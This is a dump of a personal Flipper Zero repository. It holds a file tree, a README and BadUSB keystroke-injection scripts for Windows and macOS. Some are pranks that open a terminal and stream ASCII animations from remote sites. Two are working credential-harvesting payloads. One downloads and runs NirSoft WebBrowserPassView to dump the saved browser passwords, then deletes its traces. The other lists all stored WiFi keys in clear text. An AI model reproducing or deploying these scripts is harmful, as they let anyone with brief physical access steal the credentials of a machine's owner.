├── .assets
└── passport.png
├── README.md
├── badusb
├── Fun
│ ├── Parrot_OSX.txt
│ ├── Parrot_Win.txt
│ ├── RickRoll_Term_OSX.txt
│ ├── RickRoll_Term_Win.txt
│ ├── RickRoll_YT_OSX.txt
│ └── RickRoll_YT_Win.txt
└── Passwords
│ ├── Saved_Passwords_Win.txt
│ └── WiFi_Passwords_Win.txt
├── hardware
└── wifi_board
│ ├── README.md
│ ├── WiFi Module.fzz
│ ├── back.jpg
│ ├── cutout.jpg
│ ├── front.jpg
│ ├── pcb.png
│ ├── pluggedin.jpg
│ ├── schematic.png
│ └── visual.png
├── infrared
├── Audio
│ ├── Winnes_KC_809
│ │ ├── README.md
│ │ ├── Winnes_KC_809.ir
│ │ └── player.jpg
│ └── Yamaha_RX_A860
│ │ ├── README.md
│ │ ├── Yamaha_RX_A860.ir
│ │ ├── back.jpg
│ │ └── front.jpg
├── README.md
├── Smart
│ └── LEDStrip
│ │ ├── LEDStrip.ir
│ │ ├── README.md
│ │ └── remote.jpg
└── TV
│ ├── Panasonic_N2QAYB000752
│ ├── Panasonic_N2QAYB000752.ir
│ ├── Panasonic_N2QAYB000752_Full.ir
│ ├── README.md
│ └── remote.jpg
│ └── Sony_KDL_55HX850
│ ├── README.md
│ ├── Sony_KDL_55HX850.ir
│ └── remote.jpg
└── subghz
├── Byron
└── DB421E
│ ├── Byron_DB421E.sub
│ ├── README.md
│ ├── receiver.jpg
│ └── stock.jpg
└── Flamingo
└── SF_501
├── A_ON.sub
├── A_Off.sub
├── B_OFF.sub
├── B_ON.sub
├── C_OFF.sub
├── C_ON.sub
├── D_OFF.sub
├── D_ON.sub
├── Master_OFF.sub
├── Master_ON.sub
├── README.md
├── remote.jpg
└── socket.jpg
/.assets/passport.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jkctech/Flipper-Zero-Scripts/264be519831232be95ca41a1c561a00795593d0b/.assets/passport.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Flipper Zero Scripts & Tools
2 |
3 | This is my personal collection of scripts, dumps and tools for the Flipper Zero.
4 |
5 |
6 |
7 | ## Hardware
8 |
9 | #### [WiFi Board (ESP8266 NodeMCU + NRF24L01)](hardware/wifi_board)
10 |
11 |
12 | ## Bad-USB
13 |
14 | #### Categories
15 |
16 | |Category|Description|
17 | |-|-|
18 | |`Fun`|Fun party tricks.|
19 | |`Passwords`|Ways to extract passwords.|
20 |
21 | #### Scripts
22 |
23 | |File|Description|
24 | |-|-|
25 | |`Fun/Parrot_X.txt`|Party parrot for OSX / Windows.|
26 | |`Fun/RickRoll_Term_X.txt`|Rick Roll for OSX / Windows terminal.|
27 | |`Fun/RickRoll_YT_X.txt`|Rick Roll for OSX / Windows using YouTube.|
28 | |`Passwords/Saved_Passwords_Win.txt`|Extracts passwords from Windows.|
29 | |`Passwords/WiFi_Passwords_Win.txt`|Extracts WiFi passwords from Windows.|
30 |
31 | ## IR Dumps
32 |
33 | #### Audio
34 |
35 | |File|Brand|Description|Complete|
36 | |-|-|-|-|
37 | |`Audio/Winnes_KC_809`|Winnes|CD Player|**Yes**|
38 | |`Audio/Yamaha_RX_a860`|Yamaha|Audio Amplifier|No|
39 |
40 | #### Smart
41 |
42 | |File|Brand|Description|Complete|
43 | |-|-|-|-|
44 | |`Smart/LEDStrip`|Unknown|Generic LED Strip Remote|**Yes**|
45 |
46 | #### TV
47 |
48 | |File|Brand|Description|Complete|
49 | |-|-|-|-|
50 | |`TV/Panasonic_N2QAYB000752`|Panasonic|TV|**Yes**|
51 | |`TV/Sony_KDL_55HX850`|Sony|TV|**Yes**|
52 |
53 | ## Sub-Ghz
54 |
55 | |Device|Category|Description|
56 | |-|-|-|
57 | |`Flamingo/SF_501`|Smart|Dumps for Flamingo SF-501 Remote/Socket pairs.|
58 | |`Byron/DB421E`|Doorbell|Dumps for Byron DB421E doorbell set.|
59 |
--------------------------------------------------------------------------------
/badusb/Fun/Parrot_OSX.txt:
--------------------------------------------------------------------------------
1 | REM Title: Party Parrot for OSX
2 | REM Author: Jeffrey Koopman | JKCTech
3 | REM Description: Shows a pretty party parrot!
4 | REM Target: macOS 11.0+
5 | REM
6 | DEFAULTDELAY 250
7 | GUI SPACE
8 | STRING terminal
9 | ENTER
10 | DELAY 2000
11 | STRING curl https://parrot.live &
12 | ENTER
--------------------------------------------------------------------------------
/badusb/Fun/Parrot_Win.txt:
--------------------------------------------------------------------------------
1 | REM Title: Party Parrot for Windows
2 | REM Author: Jeffrey Koopman | JKCTech
3 | REM Description: Shows a pretty party parrot!
4 | REM Target: Windows
5 | REM
6 | DEFAULTDELAY 50
7 | GUI r
8 | DELAY 500
9 | STRING powershell.exe
10 | ENTER
11 | DELAY 1000
12 | STRING $request = [System.Net.HttpWebRequest]::Create("http://parrot.live");$receiveStream=$request.GetResponse().GetResponseStream();$readStream=[System.IO.StreamReader]::new($receiveStream);[console]::TreatControlCAsInput=$true;$initialForegroundColor=[Console]::ForegroundColor;while($line=$readStream.ReadLine()){if([Console]::KeyAvailable){$key=[System.Console]::ReadKey($true);if(($key.modifiers -band [ConsoleModifiers]"control") -and ($key.key -eq "C")){break;}}[Console]::WriteLine($line);}
13 | ENTER
14 | GUI UPARROW
15 |
--------------------------------------------------------------------------------
/badusb/Fun/RickRoll_Term_OSX.txt:
--------------------------------------------------------------------------------
1 | REM Title: RickRoll
2 | REM Author: Jeffrey Koopman | JKCTech
3 | REM Description: RickRoll in Windows PowerShell
4 | REM Target: macOS 11.0+
5 | REM
6 | DEFAULTDELAY 250
7 | GUI SPACE
8 | STRING terminal
9 | ENTER
10 | DELAY 2000
11 | STRING curl https://ascii.live/rick &
12 | ENTER
--------------------------------------------------------------------------------
/badusb/Fun/RickRoll_Term_Win.txt:
--------------------------------------------------------------------------------
1 | REM Title: RickRoll
2 | REM Author: Jeffrey Koopman | JKCTech
3 | REM Description: RickRoll in Windows PowerShell
4 | REM Target: Windows
5 | REM
6 | DEFAULTDELAY 50
7 | GUI r
8 | DELAY 500
9 | STRING powershell.exe
10 | ENTER
11 | DELAY 1000
12 | STRING $request = [System.Net.HttpWebRequest]::Create("http://ascii.live/rick");$receiveStream=$request.GetResponse().GetResponseStream();$readStream=[System.IO.StreamReader]::new($receiveStream);[console]::TreatControlCAsInput=$true;$initialForegroundColor=[Console]::ForegroundColor;while($line=$readStream.ReadLine()){if([Console]::KeyAvailable){$key=[System.Console]::ReadKey($true);if(($key.modifiers -band [ConsoleModifiers]"control") -and ($key.key -eq "C")){break;}}[Console]::WriteLine($line);}
13 | ENTER
14 | GUI UPARROW
15 |
--------------------------------------------------------------------------------
/badusb/Fun/RickRoll_YT_OSX.txt:
--------------------------------------------------------------------------------
1 | REM Title: RickRoll
2 | REM Author: Jeffrey Koopman | JKCTech
3 | REM Description: Opens default browser and puts up RickRoll without ads
4 | REM Target: macOS 11.0+
5 | REM
6 | GUI SPACE
7 | DELAY 500
8 | STRING terminal
9 | ENTER
10 | DELAY 1000
11 | STRING open 'https://www.youtube.com/watch?v=xvFZjo5PgG0'; exit
12 | ENTER
13 |
--------------------------------------------------------------------------------
/badusb/Fun/RickRoll_YT_Win.txt:
--------------------------------------------------------------------------------
1 | REM Title: RickRoll
2 | REM Author: Jeffrey Koopman | JKCTech
3 | REM Description: Opens default browser and puts up RickRoll without ads
4 | REM Target: Windows
5 | REM
6 | GUI r
7 | DELAY 1000
8 | STRING powershell
9 | ENTER
10 | DELAY 1000
11 | STRING Start-Process "https://www.youtube.com/watch?v=xvFZjo5PgG0"; exit
12 | ENTER
13 |
--------------------------------------------------------------------------------
/badusb/Passwords/Saved_Passwords_Win.txt:
--------------------------------------------------------------------------------
1 | REM Title: Passwords Extractor
2 | REM Author: Jeffrey Koopman | JKCTech
3 | REM Description: Extracts saved passwords and lists them.
4 | REM Original: https://github.com/UberGuidoZ/Flipper/blob/main/BadUSB/Show_Saved_Passwords.txt
5 | REM Target: Windows
6 | REM
7 | GUI r
8 | DELAY 1000
9 | STRING powershell
10 | ENTER
11 | DELAY 1000
12 | STRING Remove-Item \temp -Recurse -Force -Confirm:$false ; mkdir \temp ; cd \temp ; Invoke-WebRequest -Headers @{'Referer' = 'http://www.nirsoft.net/utils/web_browser_password.html'} -Uri https://www.nirsoft.net/toolsdownload/webbrowserpassview.zip -OutFile wbpv.zip ; Invoke-WebRequest -Uri https://www.7-zip.org/a/7za920.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e wbpv.zip
13 | ENTER
14 | DELAY 5000
15 | STRING wbpv28821@
16 | ENTER
17 | STRING .\WebBrowserPassView.exe
18 | ENTER
19 | DELAY 3000
20 | CTRL A
21 | CTRL S
22 | DELAY 1000
23 | STRING export.htm
24 | TAB
25 | STRING h
26 | ENTER
27 | DELAY 1000
28 | ALT F4
29 | DELAY 1000
30 | STRING Start-Process msedge.exe "file:///C:/temp/export.htm --inprivate"
31 | ENTER
32 | DELAY 2000
33 | ALT TAB
34 | DELAY 1000
35 | STRING cd \
36 | ENTER
37 | STRING Remove-Item \temp -Recurse -Force -Confirm:$false ;
38 | ENTER
39 | STRING EXIT
40 | ENTER
41 |
--------------------------------------------------------------------------------
/badusb/Passwords/WiFi_Passwords_Win.txt:
--------------------------------------------------------------------------------
1 | REM Title: WiFi Passwords Extractor
2 | REM Author: Jeffrey Koopman | JKCTech
3 | REM Description: Extracts WIFi passwords and lists them.
4 | REM Original: https://github.com/UberGuidoZ/Flipper/blob/main/BadUSB/Show_WiFi_Passwords.txt
5 | REM Target: Windows
6 | REM
7 | DELAY 1000
8 | GUI r
9 | DELAY 1000
10 | STRING cmd
11 | ENTER
12 | DELAY 2000
13 | STRING cls
14 | ENTER
15 | STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
16 | ENTER
17 |
--------------------------------------------------------------------------------
/hardware/wifi_board/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |